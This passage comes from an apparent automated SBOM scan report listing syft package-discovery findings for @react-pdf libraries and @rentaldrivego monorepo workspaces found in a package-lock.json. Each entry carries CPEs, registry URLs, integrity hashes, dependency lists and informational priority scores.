description: 'Package discovered: @react-pdf/render 3.5.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3e1fba314601b9a8
|
|
name: '@react-pdf/render'
|
|
version: 3.5.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/render:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/render:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/render:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/render:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/render:3.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/render:3.5.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/render@3.5.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/render/-/render-3.5.0.tgz
|
|
integrity: sha512-gFOpnyqCgJ6l7VzfJz6rG1i2S7iVSD8bUHDjPW9Mze8TmyksHzN2zBH3y7NbsQOw1wU6hN4NhRmslrsn+BRDPA==
|
|
dependencies:
|
|
'@babel/runtime': ^7.20.13
|
|
'@react-pdf/fns': 2.2.1
|
|
'@react-pdf/primitives': ^3.1.1
|
|
'@react-pdf/textkit': ^4.4.1
|
|
'@react-pdf/types': ^2.6.0
|
|
abs-svg-path: ^0.1.1
|
|
color-string: ^1.9.1
|
|
normalize-svg-path: ^1.1.0
|
|
parse-svg-path: ^0.1.2
|
|
svg-arc-to-cubic-bezier: ^3.2.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9ecea192844aa50b
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/renderer 3.4.5'
|
|
title: '@react-pdf/renderer 3.4.5'
|
|
description: 'Package discovered: @react-pdf/renderer 3.4.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d2a573a75d297737
|
|
name: '@react-pdf/renderer'
|
|
version: 3.4.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/renderer:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/renderer:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/renderer:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/renderer:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/renderer:3.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/renderer:3.4.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/renderer@3.4.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/renderer/-/renderer-3.4.5.tgz
|
|
integrity: sha512-O1N8q45bTs7YuC+x9afJSKQWDYQy2RjoCxlxEGdbCwP+WD5G6dWRUWXlc8F0TtzU3uFglYMmDab2YhXTmnVN9g==
|
|
dependencies:
|
|
'@babel/runtime': ^7.20.13
|
|
'@react-pdf/font': ^2.5.2
|
|
'@react-pdf/layout': ^3.13.0
|
|
'@react-pdf/pdfkit': ^3.2.0
|
|
'@react-pdf/primitives': ^3.1.1
|
|
'@react-pdf/render': ^3.5.0
|
|
'@react-pdf/types': ^2.6.0
|
|
events: ^3.3.0
|
|
object-assign: ^4.1.1
|
|
prop-types: ^15.6.2
|
|
queue: ^6.0.1
|
|
scheduler: ^0.17.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 25636a50f9953390
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/stylesheet 4.3.0'
|
|
title: '@react-pdf/stylesheet 4.3.0'
|
|
description: 'Package discovered: @react-pdf/stylesheet 4.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 618f90b9a2f3d884
|
|
name: '@react-pdf/stylesheet'
|
|
version: 4.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/stylesheet:4.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/stylesheet@4.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-4.3.0.tgz
|
|
integrity: sha512-x7IVZOqRrUum9quuDeFXBveXwBht+z/6B0M+z4a4XjfSg1vZVvzoTl07Oa1yvQ/4yIC5yIkG2TSMWeKnDB+hrw==
|
|
dependencies:
|
|
'@babel/runtime': ^7.20.13
|
|
'@react-pdf/fns': 2.2.1
|
|
'@react-pdf/types': ^2.6.0
|
|
color-string: ^1.9.1
|
|
hsl-to-hex: ^1.0.0
|
|
media-engine: ^1.0.3
|
|
postcss-value-parser: ^4.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 97286ac4a749af60
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/stylesheet 6.2.1'
|
|
title: '@react-pdf/stylesheet 6.2.1'
|
|
description: 'Package discovered: @react-pdf/stylesheet 6.2.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: ff4544477cbe31d7
|
|
name: '@react-pdf/stylesheet'
|
|
version: 6.2.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/stylesheet@6.2.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-6.2.1.tgz
|
|
integrity: sha512-2+UEk+7e+z8baaWi2l5kPLWmwtJeOI+T5wW9GGeN3iDH7vd3kbTqOpN1yt9mmfNVZFxQsnDHpznFb5v5UF983A==
|
|
dependencies:
|
|
'@react-pdf/fns': 3.1.3
|
|
'@react-pdf/types': ^2.11.1
|
|
color-string: ^2.1.4
|
|
hsl-to-hex: ^1.0.0
|
|
media-engine: ^1.0.3
|
|
postcss-value-parser: ^4.1.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: aac5b1fed64c15db
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/textkit 4.4.1'
|
|
title: '@react-pdf/textkit 4.4.1'
|
|
description: 'Package discovered: @react-pdf/textkit 4.4.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9a502dcbe994e863
|
|
name: '@react-pdf/textkit'
|
|
version: 4.4.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/textkit:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/textkit:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/textkit:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/textkit:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/textkit@4.4.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/textkit/-/textkit-4.4.1.tgz
|
|
integrity: sha512-Jl9wdTqIvJ5pX+vAGz0EOhP7ut5Two9H6CzTKo/YYPeD79cM2yTXF3JzTERBC28y7LR0Waq9D2LHQjI+b/EYUQ==
|
|
dependencies:
|
|
'@babel/runtime': ^7.20.13
|
|
'@react-pdf/fns': 2.2.1
|
|
bidi-js: ^1.0.2
|
|
hyphen: ^1.6.4
|
|
unicode-properties: ^1.4.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d6967341a8bbb112
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @react-pdf/types 2.11.1'
|
|
title: '@react-pdf/types 2.11.1'
|
|
description: 'Package discovered: @react-pdf/types 2.11.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3103913e34f4201d
|
|
name: '@react-pdf/types'
|
|
version: 2.11.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@react-pdf\/types:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react-pdf\/types:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/types:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react_pdf\/types:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@react:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40react-pdf/types@2.11.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@react-pdf/types/-/types-2.11.1.tgz
|
|
integrity: sha512-i9xQgfaDU9QoeNnbp6rltXCWg1huEh195rpOuN8cE4BZ2FuLdQrsIcb2dhFF9aOxXf+XBA6LOSpIW051MDD/bw==
|
|
dependencies:
|
|
'@react-pdf/font': ^4.0.8
|
|
'@react-pdf/primitives': ^4.3.0
|
|
'@react-pdf/stylesheet': ^6.2.1
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f5a58400fb5d806d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/admin 1.0.0'
|
|
title: '@rentaldrivego/admin 1.0.0'
|
|
description: 'Package discovered: @rentaldrivego/admin 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 2a2c690594e77e74
|
|
name: '@rentaldrivego/admin'
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/admin:\@rentaldrivego\/admin:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/admin@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: ''
|
|
integrity: ''
|
|
dependencies:
|
|
'@rentaldrivego/types': '*'
|
|
autoprefixer: ^10.4.19
|
|
dayjs: ^1.11.11
|
|
lucide-react: ^0.376.0
|
|
next: 14.2.3
|
|
postcss: ^8.4.38
|
|
react: ^18.3.1
|
|
react-dom: ^18.3.1
|
|
recharts: ^2.12.7
|
|
tailwindcss: ^3.4.3
|
|
zod: ^3.23.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b0c291ec8410a1be
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/admin UNKNOWN'
|
|
title: '@rentaldrivego/admin UNKNOWN'
|
|
description: 'Package discovered: @rentaldrivego/admin UNKNOWN'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 22655bafcebdfea4
|
|
name: '@rentaldrivego/admin'
|
|
version: UNKNOWN
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/admin:\@rentaldrivego\/admin:*:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/admin
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: apps/admin
|
|
integrity: ''
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 28e1ac461cbd16df
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/api 1.0.0'
|
|
title: '@rentaldrivego/api 1.0.0'
|
|
description: 'Package discovered: @rentaldrivego/api 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 51dda2f8a6d52783
|
|
name: '@rentaldrivego/api'
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/api:\@rentaldrivego\/api:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/api@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: ''
|
|
integrity: ''
|
|
dependencies:
|
|
'@react-pdf/renderer': ^3.4.3
|
|
'@rentaldrivego/database': '*'
|
|
'@rentaldrivego/types': '*'
|
|
bcryptjs: ^2.4.3
|
|
cors: ^2.8.5
|
|
dayjs: ^1.11.11
|
|
express: ^4.19.2
|
|
express-rate-limit: ^8.5.1
|
|
firebase-admin: ^12.1.0
|
|
helmet: ^7.1.0
|
|
ioredis: ^5.3.2
|
|
jsonwebtoken: ^9.0.2
|
|
morgan: ^1.10.0
|
|
multer: ^1.4.5-lts.1
|
|
node-cron: ^3.0.3
|
|
nodemailer: ^6.9.16
|
|
otplib: ^12.0.1
|
|
qrcode: ^1.5.3
|
|
react: ^18.3.1
|
|
react-dom: ^18.3.1
|
|
resend: ^3.2.0
|
|
socket.io: ^4.7.5
|
|
twilio: ^5.1.0
|
|
zod: ^3.23.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8fa1f2444979ec05
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/api UNKNOWN'
|
|
title: '@rentaldrivego/api UNKNOWN'
|
|
description: 'Package discovered: @rentaldrivego/api UNKNOWN'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 731fc15901c69a78
|
|
name: '@rentaldrivego/api'
|
|
version: UNKNOWN
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/api:\@rentaldrivego\/api:*:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/api
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: apps/api
|
|
integrity: ''
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 5e204c38947c3756
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/dashboard 1.0.0'
|
|
title: '@rentaldrivego/dashboard 1.0.0'
|
|
description: 'Package discovered: @rentaldrivego/dashboard 1.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: fb550e5d7052cd7e
|
|
name: '@rentaldrivego/dashboard'
|
|
version: 1.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses: []
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@rentaldrivego\/dashboard:\@rentaldrivego\/dashboard:1.0.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40rentaldrivego/dashboard@1.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: ''
|
|
integrity: ''
|
|
dependencies:
|
|
'@rentaldrivego/types': '*'
|
|
autoprefixer: ^10.4.19
|
|
dayjs: ^1.11.11
|
|
lucide-react: ^0.376.0
|
|
next: 14.2.3
|
|
postcss: ^8.4.38
|
|
react: ^18.3.1
|
|
react-dom: ^18.3.1
|
|
recharts: ^2.12.7
|
|
sharp: ^0.34.5
|
|
socket.io-client: ^4.7.5
|
|
tailwindcss: ^3.4.3
|
|
zod: ^3.23.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f5ec61dae5249a19
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @rentaldrivego/dashboard UNKNOWN'
|
|
title: '@rentaldrivego/dashboard UNKNOWN'
|
|
description: 'Package discovered: @rentaldrivego/dashboard UNKNOWN'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8302af283dd2fb59
|
|
